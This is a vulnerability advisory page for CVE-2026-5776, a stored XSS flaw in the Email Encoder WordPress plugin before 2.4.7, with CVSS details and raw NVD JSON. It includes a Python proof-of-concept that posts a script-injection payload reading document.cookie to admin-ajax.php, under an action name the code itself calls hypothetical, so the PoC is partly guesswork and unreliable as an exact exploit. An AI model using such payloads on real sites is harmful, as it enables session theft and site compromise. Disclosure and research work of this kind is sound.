Security Vulnerability Report
中文
CVE-2026-5776 CVSS 6.1 MEDIUM

CVE-2026-5776

Published: 2026-05-20 07:16:16
Last Modified: 2026-05-20 14:01:24

Description

The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Email Encoder < 2.4.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: Email Encoder Plugin < 2.4.7 - Stored XSS # Date: 2026-05-20 # Exploit Author: Analyst # Vendor Homepage: https://wordpress.org/ # Software Link: https://wordpress.org/plugins/email-encoder/ # Version: < 2.4.7 # Tested on: WordPress 6.x target_url = "http://target-site.com/wp-admin/admin-ajax.php" # The specific action and parameter names depend on the plugin implementation, # typically involving an email parameter. payload = '[email protected]"><script>alert(document.cookie)</script><"' data = { "action": "email_encoder_action", # Hypothetical action name "email": payload } try: response = requests.post(target_url, data=data) if response.status_code == 200: print("Payload sent successfully. Check the admin page for execution.") else: print("Failed to send payload.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5776", "sourceIdentifier": "[email protected]", "published": "2026-05-20T07:16:15.903", "lastModified": "2026-05-20T14:01:24.027", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Email Encoder WordPress plugin before 2.4.7 does not escape email addresses retrieved via user input, allowing unauthenticated attackers to perform Stored XSS attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/00c0b9f7-c559-463e-80ae-97d99e0ef99f/", "source": "[email protected]"}]}}